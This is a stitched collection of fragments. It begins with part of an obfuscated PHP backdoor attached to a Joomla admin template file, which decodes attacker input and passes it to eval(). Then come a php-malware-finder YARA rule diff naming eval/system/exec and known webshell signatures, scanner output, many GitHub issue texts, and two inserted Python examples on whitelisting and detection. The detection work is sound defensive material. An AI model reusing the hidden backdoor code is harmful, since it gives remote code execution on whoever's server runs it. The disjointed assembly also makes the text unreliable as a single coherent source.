x9687832f($y5da781e,$efb074d){global$m6aa932e;global$fecba48;return$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($y5da781e,$fecba48),$efb074d);}foreach($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6a
a932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?><?php
/**
* @version $Id: cpanel.php 21097 2011-04-07 15:38:03Z dextercowley $
* @package Joomla.Administrator
* @subpackage Templates.hathor
* @copyright Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
* @since 1.6
*/
// no direct access
defined('_JEXEC') or die;
$app = JFactory::getApplication();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
<jdoc:include type="head" />
<!-- Load system style CSS -->
root@poney:~/php-malware-finder/php-malware-finder# git diff
diff --git a/php-malware-finder/malwares.yara b/php-malware-finder/malwares.yara
index 1fa5c22..bbb5b8f 100644
--- a/php-malware-finder/malwares.yara
+++ b/php-malware-finder/malwares.yara
@@ -57,7 +57,7 @@ private rule CloudFlareBypass
rule ObfuscatedPhp
{
strings:
- $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[[:space:]]*\(/ // ;eval( <- this is dodgy
+ $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[\t ]*\(/ // ;eval( <- this is dodgy
$b374k = "'ev'.'al'"
$align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k
$weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher
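Review bot: the only change in this hunk is the whitespace class between the function name and the opening parenthesis, from `[[:space:]]*` to `[\t ]*`, and the runs below show `{eval(` at 0x294d is caught with the `+` line and missed once the file is checked out again; but the `<\?php[[:space:]]` alternative at the start of the same pattern is left untouched, so if the POSIX class is what prevents the match, that branch is still broken and should get the same treatment. Since `\s*` already appears in this very regex right after the group, use `\s` consistently instead of mixing three spellings of "whitespace", and if a newline between `eval` and `(` is meant to stay detected, note that `[\t ]*` no longer covers it and add a test sample for that case.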
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
ObfuscatedPhp /tmp/eval//cpanel.php
0x294d:$eval: {eval(
root@poney:~/php-malware-finder/php-malware-finder# git checkout malwares.yara
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
root@poney:~/php-malware-finder/php-malware-finder#
I'm wondering why, in php.yar, there is a condition that the file must be less than 5MB: https://github.com/nbs-system/php-malware-finder/blob/be0b64f9bc936c459a6b32e76c6365bc54591b81/php-malware-finder/php.yar#L33
This seems to have been added in this commit: nbs-system/php-malware-finder@97b6069
As of 6cf5148, make tests crashes.
Step 21 : RUN make tests
---> Running in 8d2095e0ccd2
./whitelists/custom.yar(12): error: syntax error, unexpected _IDENTIFIER_
./whitelists/custom.yar(16): error: unterminated regular expression
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
Makefile:5: recipe for target 'tests' failed
make: *** [tests] Error 1
The command '/bin/sh -c make tests' returned a non-zero code: 2
ERROR: Build failed: exit code 1
See full log here: https://lw-scm.de/lipperts-web/docker-pmf/builds/2991
In version 0.3.1 that worked perfectly:
Step 21 : RUN make tests
---> Running in fbf8ddb71df3
[+] Congratz, the 54 tests succeeded!
---> 7ad857656951
I've had previously infected wordpress websites that I had to clean up. I always get a clean version and will reinstall all the plugins, but would have to manually clean a custom theme or plugin and would heavily use grep looking for eval, backticks, preg_replace with e flag etc. This project would be a nice alternative for that part of the process, however I just tried running this against a freshly downloaded wordpress and got a few false positives:
$ ./phpmalwarefinder ../wordpress/
DodgyPhp ../wordpress//wp-admin/includes/schema.php
ObfuscatedPhp ../wordpress//wp-admin/includes/template.php
ObfuscatedPhp ../wordpress//wp-admin/includes/class-ftp.php
DodgyPhp ../wordpress//wp-includes/load.php
DodgyPhp ../wordpress//wp-includes/functions.php
ObfuscatedPhp ../wordpress//wp-includes/class-IXR.php
DodgyPhp ../wordpress//wp-includes/class-pop3.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.lib.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.tag.id3v2.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.audio-video.matroska.php
DodgyPhp ../wordpress//wp-includes/class-phpmailer.php
ObfuscatedPhp ../wordpress//wp-includes/formatting.php
ObfuscatedPhp ../wordpress//wp-includes/js/tinymce/tinymce.min.js
DodgyPhp ../wordpress//wp-includes/random_compat/random.php
While I understand that false positives will always happen and I'd rather have a false positive than a false negative, it would be really useful to show the lines of code that triggered it so I can investigate it myself.
When pmf shows multiple files in its output, it can be hard for a human to sort files and find real malware.
Yara can tag files, we should use this functionality to help in detecting real webshells/web malwares.
Hi NBS, thanks for your great work!
I found a huge optimization by moving the whitelist hashing out of Yara. My client implementation is 40x faster on a standard Magento 2.0.6 source, while scanning the same stuff:
# time ./phpmalwarefinder -l php /data/all-magento/magento-2.0.6
[...]
real 9m59.357s
user 9m46.948s
sys 0m4.432s
vs
# time mwscan --ruleset nbs /data/all-magento/magento-2.0.6 --deep
Tue Jan 17 15:11:33 2017 Using NBS rules.
Tue Jan 17 15:11:33 2017 Fetching php.yar
Tue Jan 17 15:11:33 2017 Fetching whitelist.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/drupal.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/wordpress.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/symfony.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/phpmyadmin.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/magento2.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/prestashop.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/custom.yar
Tue Jan 17 15:11:34 2017 Fetching common.yar
Tue Jan 17 15:11:34 2017 Loaded 15 yara rules and 1279 whitelist entries
Tue Jan 17 15:11:48 2017 Finished scanning 41514 files: 76 malware and 25 whitelisted.
real 0m14.652s
user 0m10.116s
sys 0m1.512s
The gain comes from how inefficiently Yara handles hashing. You mentioned that in the source already. They have recently improved things in the master branch a bit, but it will take a while before that version ends up in various Linux distributions.
To test mwscan on Ubuntu:
sudo apt install -qy python-pip python-dev gcc
sudo pip install --no-cache-dir --upgrade mwscan
mwscan --help
mwscan --ruleset nbs <path>
Or CentOS:
wget https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
sudo rpm -ivh epel-release-latest-6.noarch.rpm
sudo yum -y install python-pip python-devel gcc
sudo pip install --no-cache-dir --upgrade mwscan
Cheers!
Willem
(update: I've published mwscan as a package, so you can do just pip install mwscan now)
There is a false positive test on prestashop/tools/htmlpurifier/HTMLPurifier.standalone.php
Currently, PMF uses <? to detect php files. Shall we use <?php instead to reduce false positives?
Every important open-source project has a logo; PMF should have one, since it's among the best malware-finding tools on Unix web servers.
I can't seem to fire this up. I tried using the Makefile and I also tried invoking php-malware-finder/phpmalwarefinder directly but both give the following error output:
$ ./phpmalwarefinder /var/www/sites/default/files
./php.yar(1): error: syntax error, unexpected _IDENTIFIER_, expecting $end or _RULE_ or _PRIVATE_ or _GLOBAL_
whitelists/drupal.yar(10): error: undefined identifier "hash"
whitelists/wordpress.yar(10): error: undefined identifier "hash"
whitelists/symfony.yar(10): error: undefined identifier "hash"
whitelists/phpmyadmin.yar(10): error: undefined identifier "hash"
whitelists/magento2.yar(10): error: undefined identifier "hash"
whitelists/prestashop.yar(10): error: undefined identifier "hash"
whitelists/custom.yar(11): error: undefined identifier "hash"
whitelist.yar(20): error: undefined identifier "hash"
whitelist.yar(62): error: undefined identifier "hash"
whitelist.yar(75): error: undefined identifier "hash"
whitelist.yar(84): error: undefined identifier "hash"
whitelist.yar(98): error: undefined identifier "hash"
whitelist.yar(109): error: undefined identifier "hash"
whitelist.yar(115): error: undefined identifier "Symfony"
common.yar(91): error: undefined identifier "IsWhitelisted"
common.yar(156): error: undefined identifier "IsWhitelisted"
common.yar(192): error: undefined identifier "IsWhitelisted"
./php.yar(44): error: undefined identifier "IsWhitelisted"
./php.yar(55): error: undefined identifier "IsWhitelisted"
./php.yar(71): warning: $concat is slowing down scanning
./php.yar(73): error: undefined identifier "IsWhitelisted"
./php.yar(101): error: undefined identifier "IsWhitelisted"
./php.yar(161): error: undefined identifier "IsWhitelisted"
./php.yar(175): error: undefined identifier "PasswordProtection"
There are no installation instructions except requiring YARA, which I installed (2.0.0-2 from Ubuntu 14.04.5)
Please help. I cannot use this yet.
It would be nice to check that those samples are correctly detected.
Hi! As noted in #45, your rules produce a lot of false positives for a clean Magento installation. How do you think the php-malware-finder project should handle this? Some options:
I am not sure about the best strategy. However I have created some Yara rules that are more strict and identify malware that was specifically found on Magento sites. Would love to collaborate!
Best
Willem
I compiled yara 3.4.0, but php-malware-finder still doesn't work :(
➜ php-malware-finder git:(master) yara -v 20:20:15
yara 3.4.0
➜ php-malware-finder git:(master) ./phpmalwarefinder . 20:20:17
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"
Ubuntu 14.04 (x86_64)
Currently, releases aren't signed.
We need to decide with what key we (as in NBS System) want to sign them.
Also, since we now have an update mechanism (because people are too lazy to upgrade packages), it would be great if we could sign the updates too.
There is some low-hanging fruit to improve the scanning speed:
With the commit e3b724a malwares.yara has been split up, but the Makefile, the debian packaging, and even README.md still refer to it.
While running yara -r ./phpmalwarefinder /home/USER/public_html/site/, I got the following error:
./phpmalwarefinder /home/USER/public_html/site/
TooShort /home/USER/public_html/site/something/index.php
./malwares.yara(1): error: syntax error, unexpected IDENTIFIER, expecting $end or RULE or PRIVATE or GLOBAL
whitelist.yara(10): error: undefined identifier "hash"
whitelist.yara(27): error: undefined identifier "hash"
whitelist.yara(63): error: undefined identifier "hash"
whitelist.yara(72): error: undefined identifier "hash"
whitelist.yara(92): error: undefined identifier "hash"
whitelist.yara(116): error: undefined identifier "hash"
whitelist.yara(129): error: undefined identifier "hash"
whitelist.yara(138): error: undefined identifier "hash"
whitelist.yara(152): error: undefined identifier "hash"
whitelist.yara(163): error: undefined identifier "hash"
whitelist.yara(170): error: undefined identifier "Symfony"
./malwares.yara(71): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end
./malwares.yara(129): error: undefined identifier "IsWhitelisted"
./malwares.yara(188): error: undefined identifier "IsWhitelisted"
./malwares.yara(251): error: undefined identifier "IsWhitelisted"
./malwares.yara(283): error: undefined identifier "IsWhitelisted"
I have complete rights to scan in it, if that's the problem:
sudo chown -R USER:USER /home/USER/public_html
sudo chmod -R 775 /home/USER/public_html
I also submitted this error on the yara github page:
Rationale: We don't care about people using our software in their application, as long as they contribute back to PMF.
As written in this article: https://dfir.it/blog/2016/12/07/webshells-rise-of-the-defenders-part-4/
When scanning a directory with PMF, the output has a double slash because yara concatenates it to the files and subdirs. This can lead to duplicates when trying to compare results to other outputs. So the trailing slash should be trimmed.
Sample is attached here:
https://gist.github.com/robbat2/f3e62e360f7eb1dab1a02c1e535039b8
Suggested detection: look for large strings that contain a string-reversed create_function, but be sure to check case-insensitively.
output_list.append('hash.sha1(0, filename) == %s or // %s' % (hashlib.sha1(fname).hexdigest(), fname))
It should hash the content of the file, and not its name.
It seems that writing some helper scripts and not using them isn't a great idea after all :/
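The two whitelist issues above (hashing the file name instead of its contents, and mwscan's speed-up from hashing outside of Yara) can be shown together. The following is an added example and not php-malware-finder's own helper script: it hashes file contents, renders a whitelist rule in the shape PMF uses with YARA's built-in `filesize` rather than the file name, and filters a target tree against the whitelist before anything is handed to yara. Function names, the sample trees and their contents are this example's own constructions; `hash.sha1`/`hash.sha256` and `filesize` are real YARA identifiers.

```python
"""Whitelist hashing outside YARA (added example, not PMF's own code).

Shows the two points raised in the issues above: a whitelist must hash file
*contents* (hashing the name whitelists nothing useful and a renamed copy of a
clean file would never match), and hashing once in Python, then handing only
non-whitelisted files to YARA, avoids the slow hash-module path. Standard
library only; the sample trees are constructed in a temporary directory by demo().
"""
import hashlib
import os
import tempfile


def hash_bytes(data: bytes, algo: str = "sha1") -> str:
    """Hex digest of raw content. 'sha256' works too (YARA's hash module has both)."""
    return hashlib.new(algo, data).hexdigest()


def hash_file(path: str, algo: str = "sha1") -> str:
    """Stream the file through the hash so large files are not read at once."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_whitelist(clean_root: str, algo: str = "sha1") -> dict:
    """Map digest -> path relative to clean_root for every file in a known-clean tree."""
    whitelist = {}
    for dirpath, _dirs, files in os.walk(clean_root):
        for name in files:
            full = os.path.join(dirpath, name)
            whitelist[hash_file(full, algo)] = os.path.relpath(full, clean_root)
    return whitelist


def emit_yara_whitelist(whitelist: dict, rule_name: str = "CustomWhitelist",
                        algo: str = "sha1") -> str:
    """Render one `hash.<algo>(0, filesize) == "..."` term per file, joined by `or`.
    `filesize` is YARA's built-in size of the scanned file; the bug quoted above
    passed the file name as the second argument instead."""
    head = ['import "hash"', "", f"private rule {rule_name}", "{", "    condition:"]
    items = sorted(whitelist.items())
    body = []
    for i, (digest, rel) in enumerate(items):
        joiner = " or" if i < len(items) - 1 else ""
        body.append(f'        hash.{algo}(0, filesize) == "{digest}"{joiner} // {rel}')
    if not body:
        body.append("        false")
    return "\n".join(head + body + ["}"]) + "\n"


def unwhitelisted_files(target_root: str, whitelist: dict, algo: str = "sha1") -> list:
    """Files under target_root whose content digest is not whitelisted. Only these
    need to go through yara, which is where the speed-up comes from."""
    pending = []
    for dirpath, _dirs, files in os.walk(target_root):
        for name in files:
            full = os.path.join(dirpath, name)
            if hash_file(full, algo) not in whitelist:
                pending.append(os.path.relpath(full, target_root))
    return sorted(pending)


def _write(root: str, rel: str, content: bytes) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(content)


def demo() -> dict:
    """Constructed sample: a clean CMS tree and a deployed copy with one extra file."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = os.path.join(tmp, "clean"), os.path.join(tmp, "site")
        index = b"<?php\necho 'hello';\n"
        loader = b"<?php\nfunction wp_load() {}\n"
        _write(clean, "index.php", index)
        _write(clean, "wp-includes/load.php", loader)
        _write(site, "index.php", index)                       # identical to the clean copy
        _write(site, "wp-includes/load-renamed.php", loader)   # renamed copy, same content
        _write(site, "uploads/unknown.php", b"<?php\n// not in the clean tree\n")
        wl = build_whitelist(clean)
        return {
            "whitelisted": len(wl),
            "pending": unwhitelisted_files(site, wl),
            "rule": emit_yara_whitelist(wl),
        }


if __name__ == "__main__":
    result = demo()
    print(result["rule"])
    print("files left for yara:", result["pending"])
```

The renamed copy of load.php stays whitelisted because only content is hashed, which is exactly what the name-hashing bug would have broken; the generated rule text can be dropped into whitelists/custom.yar as-is.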
doubleval($_POST[$index]);
But it's not eval($_POST), it just looks like it.
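The requests above for line numbers and snippets of hits, the suggested reversed-create_function detection, and this doubleval false positive all come down to how a pattern is written and reported. The block below is an added example and not php-malware-finder's own rules: it renders the `$eval` regex quoted in the diff above in Python (with YARA's `[[:space:]]` written as `\s`, which is an assumed equivalence), reports each hit with its line and source line, adds the case-insensitive reversed create_function check, and contrasts an unanchored `eval(` pattern that fires on `doubleval(` with the anchored one that does not. `DANGEROUS_FUNCS`, `scan`, `CLEAN` and `SHELL` are this example's own names and constructed inputs.

```python
"""Rule hits with line context, and why anchoring matters (added example).

Not php-malware-finder's rules. Covers three points from the issues above:
report the line number and snippet of each hit, look for a string-reversed
create_function regardless of case, and do not report doubleval($_POST[...])
as eval($_POST). ANCHORED_CALL is a Python rendering of the $eval regex from the
diff above, with [[:space:]] written as \\s (assumed equivalent).
"""
import re

DANGEROUS_FUNCS = r"eval|preg_replace|system|exec|assert|passthru|win_shell_execute"

# Unanchored form: 'eval(' anywhere in the text, so 'doubleval(' fires as well.
NAIVE_EVAL = re.compile(r"eval\s*\(")

# Anchored form: the call must start a statement, i.e. follow '<?php' plus
# whitespace or one of ; { }, with an optional '@' in front of the name.
ANCHORED_CALL = re.compile(
    r"(?:<\?php\s|[;{}])\s*@?(?P<fn>" + DANGEROUS_FUNCS + r")[\t ]*\("
)

# create_function spelled backwards, as strrev() would yield it; case-insensitive
# because the suggested detection above asks for that.
REVERSED_CREATE_FUNCTION = re.compile(re.escape("create_function"[::-1]), re.IGNORECASE)


def _line_of(src: str, pos: int) -> int:
    """1-based line number of offset pos."""
    return src.count("\n", 0, pos) + 1


def _snippet(src: str, pos: int) -> str:
    """The whole source line containing offset pos, stripped of surrounding whitespace."""
    start = src.rfind("\n", 0, pos) + 1
    end = src.find("\n", pos)
    return src[start:end if end != -1 else len(src)].strip()


def naive_hit_count(src: str) -> int:
    """How often the unanchored pattern fires; used only to show the false positive."""
    return len(NAIVE_EVAL.findall(src))


def scan(src: str) -> list:
    """Return (rule, line, snippet) for every hit, ordered by line."""
    hits = []
    for m in ANCHORED_CALL.finditer(src):
        pos = m.start("fn")  # report the line of the call, not of the preceding ';'
        hits.append(("dangerous_call", _line_of(src, pos), _snippet(src, pos)))
    for m in REVERSED_CREATE_FUNCTION.finditer(src):
        pos = m.start()
        hits.append(("reversed_create_function", _line_of(src, pos), _snippet(src, pos)))
    return sorted(hits, key=lambda h: h[1])


def scan_file(path: str) -> list:
    """Same as scan(), reading the file from disk."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return scan(fh.read())


# Constructed samples: a benign doubleval() call, and a file with a statement-level
# eval plus a reversed create_function string.
CLEAN = "<?php\n$x = doubleval($_POST[$index]);\n$y = intval($x);\n"
SHELL = "<?php\n$a = 1;\n  eval($_POST['c']);\n$f = strrev('NOITCNUF_ETAERC');\n"

if __name__ == "__main__":
    print("unanchored pattern on the clean file:", naive_hit_count(CLEAN), "hit(s)")
    print("anchored scan on the clean file:", scan(CLEAN))
    for rule, line, snippet in scan(SHELL):
        print(f"{rule}: line {line}: {snippet}")
```

Because `[\t ]*` (the form the diff above switches to) does not span newlines, `eval` followed by a line break and then `(` is not reported; `\s*` between the statement boundary and the name still is, so an indented call on the line after a `;` is caught and attributed to its own line.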
In the documentation you are pointed to run make test, which will fail with "no goal found". In the Makefile this task is called tests: https://github.com/nbs-system/php-malware-finder/blob/master/Makefile#L4
Could you update the Makefile or the documentation?